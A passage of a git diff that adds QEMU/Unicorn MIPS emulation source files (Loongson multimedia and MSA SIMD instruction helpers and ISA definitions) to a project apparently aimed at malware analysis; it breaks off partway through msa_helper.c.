+DEF_HELPER_5(msa_fclt_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcult_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcle_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcule_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsaf_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsun_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fseq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsueq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fslt_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsult_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsle_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsule_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fadd_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsub_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmul_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fdiv_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmadd_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmsub_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fexp2_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fexdo_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_ftq_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmin_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmin_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmax_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fmax_a_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcor_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcune_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fcne_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mul_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_madd_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_msub_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsor_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsune_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_fsne_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_mulr_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_maddr_q_df, void, env, i32, i32, i32, i32) +DEF_HELPER_5(msa_msubr_q_df, void, env, i32, i32, i32, i32) + +DEF_HELPER_4(msa_and_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_or_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_nor_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_xor_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bmnz_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bmz_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_bsel_v, void, env, i32, i32, i32) +DEF_HELPER_4(msa_fill_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_pcnt_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_nloc_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_nlzc_df, void, env, i32, i32, i32) + +DEF_HELPER_4(msa_fclass_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ftrunc_s_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ftrunc_u_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_fsqrt_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_frsqrt_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_frcp_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_frint_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_flog2_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_fexupl_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_fexupr_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ffql_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ffqr_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ftint_s_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ftint_u_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ffint_s_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ffint_u_df, void, env, i32, i32, i32) + +DEF_HELPER_5(msa_ld_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_st_df, void, env, i32, i32, i32, s32) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/lmi_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/lmi_helper.c new file mode 100644 index 0000000..bbfcd59 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/lmi_helper.c @@ -0,0 +1,744 @@ +/* + * Loongson Multimedia Instruction emulation helpers for QEMU. + * + * Copyright (c) 2011 Richard Henderson + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +/* If the byte ordering doesn't matter, i.e. all columns are treated + identically, then this union can be used directly. If byte ordering + does matter, we generally ignore dumping to memory. */ +typedef union { + uint8_t ub[8]; + int8_t sb[8]; + uint16_t uh[4]; + int16_t sh[4]; + uint32_t uw[2]; + int32_t sw[2]; + uint64_t d; +} LMIValue; + +/* Some byte ordering issues can be mitigated by XORing in the following. */ +#ifdef HOST_WORDS_BIGENDIAN +# define BYTE_ORDER_XOR(N) N +#else +# define BYTE_ORDER_XOR(N) 0 +#endif + +#define SATSB(x) (x < -0x80 ? -0x80 : x > 0x7f ? 0x7f : x) +#define SATUB(x) (x > 0xff ? 0xff : x) + +#define SATSH(x) (x < -0x8000 ? -0x8000 : x > 0x7fff ? 0x7fff : x) +#define SATUH(x) (x > 0xffff ? 0xffff : x) + +#define SATSW(x) \ + (x < -0x80000000ll ? -0x80000000ll : x > 0x7fffffff ? 0x7fffffff : x) +#define SATUW(x) (x > 0xffffffffull ? 0xffffffffull : x) + +uint64_t helper_paddsb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.sb[i] + vt.sb[i]; + vs.sb[i] = SATSB(r); + } + return vs.d; +} + +uint64_t helper_paddusb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.ub[i] + vt.ub[i]; + vs.ub[i] = SATUB(r); + } + return vs.d; +} + +uint64_t helper_paddsh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int r = vs.sh[i] + vt.sh[i]; + vs.sh[i] = SATSH(r); + } + return vs.d; +} + +uint64_t helper_paddush(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int r = vs.uh[i] + vt.uh[i]; + vs.uh[i] = SATUH(r); + } + return vs.d; +} + +uint64_t helper_paddb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + vs.ub[i] += vt.ub[i]; + } + return vs.d; +} + +uint64_t helper_paddh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + vs.uh[i] += vt.uh[i]; + } + return vs.d; +} + +uint64_t helper_paddw(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 2; ++i) { + vs.uw[i] += vt.uw[i]; + } + return vs.d; +} + +uint64_t helper_psubsb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.sb[i] - vt.sb[i]; + vs.sb[i] = SATSB(r); + } + return vs.d; +} + +uint64_t helper_psubusb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.ub[i] - vt.ub[i]; + vs.ub[i] = SATUB(r); + } + return vs.d; +} + +uint64_t helper_psubsh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int r = vs.sh[i] - vt.sh[i]; + vs.sh[i] = SATSH(r); + } + return vs.d; +} + +uint64_t helper_psubush(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int r = vs.uh[i] - vt.uh[i]; + vs.uh[i] = SATUH(r); + } + return vs.d; +} + +uint64_t helper_psubb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + vs.ub[i] -= vt.ub[i]; + } + return vs.d; +} + +uint64_t helper_psubh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + vs.uh[i] -= vt.uh[i]; + } + return vs.d; +} + +uint64_t helper_psubw(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 2; ++i) { + vs.uw[i] -= vt.uw[i]; + } + return vs.d; +} + +uint64_t helper_pshufh(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(3); + LMIValue vd, vs; + unsigned i; + + vs.d = fs; + vd.d = 0; + for (i = 0; i < 4; i++, ft >>= 2) { + vd.uh[i ^ host] = vs.uh[(ft & 3) ^ host]; + } + return vd.d; +} + +uint64_t helper_packsswh(uint64_t fs, uint64_t ft) +{ + uint64_t fd = 0; + int64_t tmp; + + tmp = (int32_t)(fs >> 0); + tmp = SATSH(tmp); + fd |= (tmp & 0xffff) << 0; + + tmp = (int32_t)(fs >> 32); + tmp = SATSH(tmp); + fd |= (tmp & 0xffff) << 16; + + tmp = (int32_t)(ft >> 0); + tmp = SATSH(tmp); + fd |= (tmp & 0xffff) << 32; + + tmp = (int32_t)(ft >> 32); + tmp = SATSH(tmp); + fd |= (tmp & 0xffff) << 48; + + return fd; +} + +uint64_t helper_packsshb(uint64_t fs, uint64_t ft) +{ + uint64_t fd = 0; + unsigned int i; + + for (i = 0; i < 4; ++i) { + int16_t tmp = fs >> (i * 16); + tmp = SATSB(tmp); + fd |= (uint64_t)(tmp & 0xff) << (i * 8); + } + for (i = 0; i < 4; ++i) { + int16_t tmp = ft >> (i * 16); + tmp = SATSB(tmp); + fd |= (uint64_t)(tmp & 0xff) << (i * 8 + 32); + } + + return fd; +} + +uint64_t helper_packushb(uint64_t fs, uint64_t ft) +{ + uint64_t fd = 0; + unsigned int i; + + for (i = 0; i < 4; ++i) { + int16_t tmp = fs >> (i * 16); + tmp = SATUB(tmp); + fd |= (uint64_t)(tmp & 0xff) << (i * 8); + } + for (i = 0; i < 4; ++i) { + int16_t tmp = ft >> (i * 16); + tmp = SATUB(tmp); + fd |= (uint64_t)(tmp & 0xff) << (i * 8 + 32); + } + + return fd; +} + +uint64_t helper_punpcklwd(uint64_t fs, uint64_t ft) +{ + return (fs & 0xffffffff) | (ft << 32); +} + +uint64_t helper_punpckhwd(uint64_t fs, uint64_t ft) +{ + return (fs >> 32) | (ft & ~0xffffffffull); +} + +uint64_t helper_punpcklhw(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(3); + LMIValue vd, vs, vt; + + vs.d = fs; + vt.d = ft; + vd.uh[0 ^ host] = vs.uh[0 ^ host]; + vd.uh[1 ^ host] = vt.uh[0 ^ host]; + vd.uh[2 ^ host] = vs.uh[1 ^ host]; + vd.uh[3 ^ host] = vt.uh[1 ^ host]; + + return vd.d; +} + +uint64_t helper_punpckhhw(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(3); + LMIValue vd, vs, vt; + + vs.d = fs; + vt.d = ft; + vd.uh[0 ^ host] = vs.uh[2 ^ host]; + vd.uh[1 ^ host] = vt.uh[2 ^ host]; + vd.uh[2 ^ host] = vs.uh[3 ^ host]; + vd.uh[3 ^ host] = vt.uh[3 ^ host]; + + return vd.d; +} + +uint64_t helper_punpcklbh(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(7); + LMIValue vd, vs, vt; + + vs.d = fs; + vt.d = ft; + vd.ub[0 ^ host] = vs.ub[0 ^ host]; + vd.ub[1 ^ host] = vt.ub[0 ^ host]; + vd.ub[2 ^ host] = vs.ub[1 ^ host]; + vd.ub[3 ^ host] = vt.ub[1 ^ host]; + vd.ub[4 ^ host] = vs.ub[2 ^ host]; + vd.ub[5 ^ host] = vt.ub[2 ^ host]; + vd.ub[6 ^ host] = vs.ub[3 ^ host]; + vd.ub[7 ^ host] = vt.ub[3 ^ host]; + + return vd.d; +} + +uint64_t helper_punpckhbh(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(7); + LMIValue vd, vs, vt; + + vs.d = fs; + vt.d = ft; + vd.ub[0 ^ host] = vs.ub[4 ^ host]; + vd.ub[1 ^ host] = vt.ub[4 ^ host]; + vd.ub[2 ^ host] = vs.ub[5 ^ host]; + vd.ub[3 ^ host] = vt.ub[5 ^ host]; + vd.ub[4 ^ host] = vs.ub[6 ^ host]; + vd.ub[5 ^ host] = vt.ub[6 ^ host]; + vd.ub[6 ^ host] = vs.ub[7 ^ host]; + vd.ub[7 ^ host] = vt.ub[7 ^ host]; + + return vd.d; +} + +uint64_t helper_pavgh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; i++) { + vs.uh[i] = (vs.uh[i] + vt.uh[i] + 1) >> 1; + } + return vs.d; +} + +uint64_t helper_pavgb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; i++) { + vs.ub[i] = (vs.ub[i] + vt.ub[i] + 1) >> 1; + } + return vs.d; +} + +uint64_t helper_pmaxsh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; i++) { + vs.sh[i] = (vs.sh[i] >= vt.sh[i] ? vs.sh[i] : vt.sh[i]); + } + return vs.d; +} + +uint64_t helper_pminsh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; i++) { + vs.sh[i] = (vs.sh[i] <= vt.sh[i] ? vs.sh[i] : vt.sh[i]); + } + return vs.d; +} + +uint64_t helper_pmaxub(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; i++) { + vs.ub[i] = (vs.ub[i] >= vt.ub[i] ? vs.ub[i] : vt.ub[i]); + } + return vs.d; +} + +uint64_t helper_pminub(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; i++) { + vs.ub[i] = (vs.ub[i] <= vt.ub[i] ? vs.ub[i] : vt.ub[i]); + } + return vs.d; +} + +uint64_t helper_pcmpeqw(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 2; i++) { + vs.uw[i] = -(vs.uw[i] == vt.uw[i]); + } + return vs.d; +} + +uint64_t helper_pcmpgtw(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 2; i++) { + vs.uw[i] = -(vs.uw[i] > vt.uw[i]); + } + return vs.d; +} + +uint64_t helper_pcmpeqh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; i++) { + vs.uh[i] = -(vs.uh[i] == vt.uh[i]); + } + return vs.d; +} + +uint64_t helper_pcmpgth(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; i++) { + vs.uh[i] = -(vs.uh[i] > vt.uh[i]); + } + return vs.d; +} + +uint64_t helper_pcmpeqb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; i++) { + vs.ub[i] = -(vs.ub[i] == vt.ub[i]); + } + return vs.d; +} + +uint64_t helper_pcmpgtb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; i++) { + vs.ub[i] = -(vs.ub[i] > vt.ub[i]); + } + return vs.d; +} + +uint64_t helper_psllw(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 31) { + return 0; + } + vs.d = fs; + for (i = 0; i < 2; ++i) { + vs.uw[i] <<= ft; + } + return vs.d; +} + +uint64_t helper_psrlw(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 31) { + return 0; + } + vs.d = fs; + for (i = 0; i < 2; ++i) { + vs.uw[i] >>= ft; + } + return vs.d; +} + +uint64_t helper_psraw(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 31) { + ft = 31; + } + vs.d = fs; + for (i = 0; i < 2; ++i) { + vs.sw[i] >>= ft; + } + return vs.d; +} + +uint64_t helper_psllh(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 15) { + return 0; + } + vs.d = fs; + for (i = 0; i < 4; ++i) { + vs.uh[i] <<= ft; + } + return vs.d; +} + +uint64_t helper_psrlh(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 15) { + return 0; + } + vs.d = fs; + for (i = 0; i < 4; ++i) { + vs.uh[i] >>= ft; + } + return vs.d; +} + +uint64_t helper_psrah(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 15) { + ft = 15; + } + vs.d = fs; + for (i = 0; i < 4; ++i) { + vs.sh[i] >>= ft; + } + return vs.d; +} + +uint64_t helper_pmullh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + vs.sh[i] *= vt.sh[i]; + } + return vs.d; +} + +uint64_t helper_pmulhh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int32_t r = vs.sh[i] * vt.sh[i]; + vs.sh[i] = r >> 16; + } + return vs.d; +} + +uint64_t helper_pmulhuh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + uint32_t r = vs.uh[i] * vt.uh[i]; + vs.uh[i] = r >> 16; + } + return vs.d; +} + +uint64_t helper_pmaddhw(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(3); + LMIValue vs, vt; + uint32_t p0, p1; + + vs.d = fs; + vt.d = ft; + p0 = vs.sh[0 ^ host] * vt.sh[0 ^ host]; + p0 += vs.sh[1 ^ host] * vt.sh[1 ^ host]; + p1 = vs.sh[2 ^ host] * vt.sh[2 ^ host]; + p1 += vs.sh[3 ^ host] * vt.sh[3 ^ host]; + + return ((uint64_t)p1 << 32) | p0; +} + +uint64_t helper_pasubub(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.ub[i] - vt.ub[i]; + vs.ub[i] = (r < 0 ? -r : r); + } + return vs.d; +} + +uint64_t helper_biadd(uint64_t fs) +{ + unsigned i, fd; + + for (i = fd = 0; i < 8; ++i) { + fd += (fs >> (i * 8)) & 0xff; + } + return fd & 0xffff; +} + +uint64_t helper_pmovmskb(uint64_t fs) +{ + unsigned fd = 0; + + fd |= ((fs >> 7) & 1) << 0; + fd |= ((fs >> 15) & 1) << 1; + fd |= ((fs >> 23) & 1) << 2; + fd |= ((fs >> 31) & 1) << 3; + fd |= ((fs >> 39) & 1) << 4; + fd |= ((fs >> 47) & 1) << 5; + fd |= ((fs >> 55) & 1) << 6; + fd |= ((fs >> 63) & 1) << 7; + + return fd & 0xff; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/mips-defs.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/mips-defs.h new file mode 100644 index 0000000..1784227 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/mips-defs.h @@ -0,0 +1,91 @@ +#if !defined (__QEMU_MIPS_DEFS_H__) +#define __QEMU_MIPS_DEFS_H__ + +/* If we want to use host float regs... */ +//#define USE_HOST_FLOAT_REGS + +/* Real pages are variable size... */ +#define TARGET_PAGE_BITS 12 +#define MIPS_TLB_MAX 128 + +#if defined(TARGET_MIPS64) +#define TARGET_LONG_BITS 64 +#define TARGET_PHYS_ADDR_SPACE_BITS 36 +#define TARGET_VIRT_ADDR_SPACE_BITS 42 +#else +#define TARGET_LONG_BITS 32 +#define TARGET_PHYS_ADDR_SPACE_BITS 36 +#define TARGET_VIRT_ADDR_SPACE_BITS 32 +#endif + +/* Masks used to mark instructions to indicate which ISA level they + were introduced in. */ +#define ISA_MIPS1 0x00000001 +#define ISA_MIPS2 0x00000002 +#define ISA_MIPS3 0x00000004 +#define ISA_MIPS4 0x00000008 +#define ISA_MIPS5 0x00000010 +#define ISA_MIPS32 0x00000020 +#define ISA_MIPS32R2 0x00000040 +#define ISA_MIPS64 0x00000080 +#define ISA_MIPS64R2 0x00000100 +#define ISA_MIPS32R3 0x00000200 +#define ISA_MIPS64R3 0x00000400 +#define ISA_MIPS32R5 0x00000800 +#define ISA_MIPS64R5 0x00001000 +#define ISA_MIPS32R6 0x00002000 +#define ISA_MIPS64R6 0x00004000 + +/* MIPS ASEs. */ +#define ASE_MIPS16 0x00010000 +#define ASE_MIPS3D 0x00020000 +#define ASE_MDMX 0x00040000 +#define ASE_DSP 0x00080000 +#define ASE_DSPR2 0x00100000 +#define ASE_MT 0x00200000 +#define ASE_SMARTMIPS 0x00400000 +#define ASE_MICROMIPS 0x00800000 +#define ASE_MSA 0x01000000 + +/* Chip specific instructions. */ +#define INSN_LOONGSON2E 0x20000000 +#define INSN_LOONGSON2F 0x40000000 +#define INSN_VR54XX 0x80000000 + +/* MIPS CPU defines. */ +#define CPU_MIPS1 (ISA_MIPS1) +#define CPU_MIPS2 (CPU_MIPS1 | ISA_MIPS2) +#define CPU_MIPS3 (CPU_MIPS2 | ISA_MIPS3) +#define CPU_MIPS4 (CPU_MIPS3 | ISA_MIPS4) +#define CPU_VR54XX (CPU_MIPS4 | INSN_VR54XX) +#define CPU_LOONGSON2E (CPU_MIPS3 | INSN_LOONGSON2E) +#define CPU_LOONGSON2F (CPU_MIPS3 | INSN_LOONGSON2F) + +#define CPU_MIPS5 (CPU_MIPS4 | ISA_MIPS5) + +/* MIPS Technologies "Release 1" */ +#define CPU_MIPS32 (CPU_MIPS2 | ISA_MIPS32) +#define CPU_MIPS64 (CPU_MIPS5 | CPU_MIPS32 | ISA_MIPS64) + +/* MIPS Technologies "Release 2" */ +#define CPU_MIPS32R2 (CPU_MIPS32 | ISA_MIPS32R2) +#define CPU_MIPS64R2 (CPU_MIPS64 | CPU_MIPS32R2 | ISA_MIPS64R2) + +/* MIPS Technologies "Release 3" */ +#define CPU_MIPS32R3 (CPU_MIPS32R2 | ISA_MIPS32R3) +#define CPU_MIPS64R3 (CPU_MIPS64R2 | CPU_MIPS32R3 | ISA_MIPS64R3) + +/* MIPS Technologies "Release 5" */ +#define CPU_MIPS32R5 (CPU_MIPS32R3 | ISA_MIPS32R5) +#define CPU_MIPS64R5 (CPU_MIPS64R3 | CPU_MIPS32R5 | ISA_MIPS64R5) + +/* MIPS Technologies "Release 6" */ +#define CPU_MIPS32R6 (CPU_MIPS32R5 | ISA_MIPS32R6) +#define CPU_MIPS64R6 (CPU_MIPS64R5 | CPU_MIPS32R6 | ISA_MIPS64R6) + +/* Strictly follow the architecture standard: + - Disallow "special" instruction handling for PMON/SPIM. + Note that we still maintain Count/Compare to match the host clock. */ +//#define MIPS_STRICT_STANDARD 1 + +#endif /* !defined (__QEMU_MIPS_DEFS_H__) */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/msa_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/msa_helper.c new file mode 100644 index 0000000..dccadc4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/msa_helper.c @@ -0,0 +1,3436 @@ +/* + * MIPS SIMD Architecture Module Instruction emulation helpers for QEMU. + * + * Copyright (c) 2014 Imagination Technologies + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +/* Data format min and max values */ +#define DF_BITS(df) ((uint64_t)1 << ((df) + 3)) + +#define DF_MAX_INT(df) (int64_t)((1LL << (DF_BITS(df) - 1)) - 1) +#define M_MAX_INT(m) (int64_t)((1LL << ((m) - 1)) - 1) + +#define DF_MIN_INT(df) (int64_t)(-(1LL << (DF_BITS(df) - 1))) +#define M_MIN_INT(m) (int64_t)(-(1LL << ((m) - 1))) + +#define DF_MAX_UINT(df) (uint64_t)((0-1ULL) >> (64 - DF_BITS(df))) +#define M_MAX_UINT(m) (uint64_t)((0-1ULL) >> (64 - (m))) + +#define UNSIGNED(x, df) ((x) & DF_MAX_UINT(df)) +#define SIGNED(x, df) \ + ((((int64_t)x) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df))) + +/* Element-by-element access macros */ +#define DF_ELEMENTS(df) (MSA_WRLEN / DF_BITS(df)) + +static inline void msa_move_v(wr_t *pwd, wr_t *pws) +{ + uint32_t i; + + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = pws->d[i]; + } +} + +#define MSA_FN_IMM8(FUNC, DEST, OPERATION) \ +void helper_msa_ ## FUNC(CPUMIPSState *env, uint32_t wd, uint32_t ws, \ + uint32_t i8) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + DEST = OPERATION; \ + } \ +} + +MSA_FN_IMM8(andi_b, pwd->b[i], pws->b[i] & i8) +MSA_FN_IMM8(ori_b, pwd->b[i], pws->b[i] | i8) +MSA_FN_IMM8(nori_b, pwd->b[i], ~(pws->b[i] | i8)) +MSA_FN_IMM8(xori_b, pwd->b[i], pws->b[i] ^ i8) + +#define BIT_MOVE_IF_NOT_ZERO(dest, arg1, arg2, df) \ + UNSIGNED(((dest & (~arg2)) | (arg1 & arg2)), df) +MSA_FN_IMM8(bmnzi_b, pwd->b[i], + BIT_MOVE_IF_NOT_ZERO(pwd->b[i], pws->b[i], i8, DF_BYTE)) + +#define BIT_MOVE_IF_ZERO(dest, arg1, arg2, df) \ + UNSIGNED((dest & arg2) | (arg1 & (~arg2)), df) +MSA_FN_IMM8(bmzi_b, pwd->b[i], + BIT_MOVE_IF_ZERO(pwd->b[i], pws->b[i], i8, DF_BYTE)) + +#define BIT_SELECT(dest, arg1, arg2, df) \ + UNSIGNED((arg1 & (~dest)) | (arg2 & dest), df) +MSA_FN_IMM8(bseli_b, pwd->b[i], + BIT_SELECT(pwd->b[i], pws->b[i], i8, DF_BYTE)) + +#undef MSA_FN_IMM8 + +#define SHF_POS(i, imm) (((i) & 0xfc) + (((imm) >> (2 * ((i) & 0x03))) & 0x03)) + +void helper_msa_shf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t imm) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t 